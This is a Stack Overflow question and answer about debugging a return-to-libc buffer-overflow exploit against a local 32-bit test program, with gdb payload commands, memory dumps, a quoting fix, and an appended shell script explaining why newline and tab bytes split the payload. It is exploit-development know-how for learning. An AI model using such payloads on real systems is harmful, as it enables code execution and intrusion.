Certain parts of the injected string are missing from the stack frame

0

I'm trying a return-to-libc exploit on a simple program. I've managed to locate the stack address where the input string is stored and the locations of the libc functions, and built my payload based on them.

[padding(252-byte)] + [system(4-byte)] + [exit(4-byte)] + [argument(4-byte)]

I opened the vulnerable program with gdb and injected the payload. When I check the stack frame I can see the 252-byte padding loaded at the correct location, but the last 12-byte part of the payload seems to be missing or, somehow, replaced with some duds.

So out of curiosity I changed my payload a bit, particularly the padding part.

[padding(96)]+[system(4)]+[padding(152)]+[system(4)]+[exit(4)]+[argument(4)]

Then the stack holds only the first 96-byte part and the rest is not there.

I injected the payload with python on 64-bit Kali Linux. The vulnerable program is compiled with gcc with the -m32 -fno-stack-protector options.

(gdb) run $(python -c 'print "\x41"*252 + "\x60\x0a\x05\x08" + "\x30\xfd\x04\x08" + "\x64\x79\x09\x08"')

(gdb) x/256xw $ebp-0xfc
0xffffd010: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd020: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd030: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd040: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd050: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd060: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd070: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd080: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd090: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd0a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd0b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd0c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd0d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd0e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd0f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd100: 0x41414141 0x41414141 0x41414141 0x00000060
0xffffd110: 0xffffd130 0x080dc000 0x00000000 0x0804a25b
0xffffd120: 0x080dc000 0x080dc000 0x080dc000 0x0804a25b
0xffffd130: 0x00000003 0xffffd1e4 0xffffd1f4 0xffffd184
0xffffd140: 0x00000000 0x00000000 0x00000000 0x080dc000
...

(gdb) run $(python -c 'print "\x41"*96 +"\x60\x0a\x05\x08"+ "\x41"*152 + "\x60\x0a\x05\x08" + "\x30\xfd\x04\x08" + "\x64\x79\x09\x08"')

(gdb) x/256wx $ebp-0xfc
0xffffd010: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd020: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd030: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd040: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd050: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd060: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd070: 0x00000060 0x00000000 0x0000bfc0 0xa9173800
0xffffd080: 0x080b12ef 0x00002933 0x00000000 0x080dc000
0xffffd090: 0x00000001 0x080dc000 0x080dd900 0x080495fa
0xffffd0a0: 0x00000004 0x080ddf74 0x0804fa99 0x00008000
0xffffd0b0: 0x080b0fa5 0x00040000 0x00000000 0x080abc6a
...

It seems the address \x60\x0a\x05\x08 is somehow replaced with \x60\x00\x00\x00. Is there something I'm missing? Or does this have to do with the compiler?

c
gcc
gdb
buffer-overflow
asked on Stack Overflow Mar 27, 2019 by bibichachooo

1 Answer

0

It seems you're trying to run the program passing the payload as an argument, but it contains the character \x0a, which causes the payload to be split into two separate arguments.

Adding double quotes around the command should allow you to pass it as a single argument:

(gdb) run "$(python -c 'print "\x41"*252 + "\x60\x0a\x05\x08" + "\x30\xfd\x04\x08" + "\x64\x79\x09\x08"')"
answered on Stack Overflow Mar 27, 2019 by yachoor • edited Mar 27, 2019 by yachoor
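The splitting the answer describes can be reproduced without gdb or the vulnerable binary. The script below is an added example, not code from the question or the answer: it emits the 264-byte payload from the question as raw bytes and then performs the same unquoted and double-quoted `$(...)` substitutions the two `run` commands do, reporting how many arguments the target would receive and how long the first one is. It assumes a POSIX shell with the default IFS (space, tab, newline), which is what gdb's `run` hands the argument string to. Note that the payload contains two IFS bytes, not one: the 0x0a in the system() address and the 0x09 (tab) in the argument address, so the unquoted form actually yields three arguments.

```sh
#!/bin/sh
# Added example (not from the original post): reproduces the IFS word
# splitting that the answer describes, using the payload bytes from the
# question.  Runs in any POSIX shell; no gdb or target binary required.
LC_ALL=C
export LC_ALL

# Emit the 264-byte payload from the question as raw bytes: 252 bytes of
# padding, then system(), exit() and the argument address, little-endian.
# Octal escapes are used because \x is not POSIX printf.
build_payload() {
    i=0
    while [ "$i" -lt 252 ]; do
        printf 'A'
        i=$((i + 1))
    done
    printf '\140\012\005\010'   # 0x08050a60  system   (0x0a is a newline)
    printf '\060\375\004\010'   # 0x0804fd30  exit
    printf '\144\171\011\010'   # 0x08097964  argument (0x09 is a tab)
}

# Unquoted $(...): the shell splits the substituted text on every IFS byte
# (space, tab, newline by default).  The 0x0a inside the system() address
# and the 0x09 inside the argument address each start a new argv entry.
# Prints the number of arguments the target would receive.
argc_unquoted() {
    set -- $(build_payload)
    echo "$#"
}

# Byte length of argv[1] in the unquoted case: the 252 'A's plus the single
# 0x60 byte that precedes the newline.  That matches the question's dump,
# where the 0x41414141 run is followed by 0x00000060: the 0x60, then the NUL
# that terminates the argv string, then nothing of the rest of the payload.
first_arg_len_unquoted() {
    set -- $(build_payload)
    printf '%s' "$1" | wc -c | tr -d ' '
}

# Double-quoted "$(...)": no field splitting, so the whole payload is argv[1].
argc_quoted() {
    set -- "$(build_payload)"
    echo "$#"
}

first_arg_len_quoted() {
    set -- "$(build_payload)"
    printf '%s' "$1" | wc -c | tr -d ' '
}

# Stand-alone run: prints 3 and 253 for the unquoted case, 1 and 264 for
# the quoted one.
main() {
    echo "unquoted: argc=$(argc_unquoted) argv[1] bytes=$(first_arg_len_unquoted)"
    echo "quoted:   argc=$(argc_quoted) argv[1] bytes=$(first_arg_len_quoted)"
}
main
```

The same rule applies inside gdb because `run` passes its argument string to the shell by default, which is why the quoted form in the answer works. Quoting does not help with a 0x00 byte: argv strings are NUL-terminated by execve, so an address containing 0x00 cannot be delivered through a command-line argument at all and has to come in through another channel (stdin, a file, an environment variable).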

User contributions licensed under CC BY-SA 3.0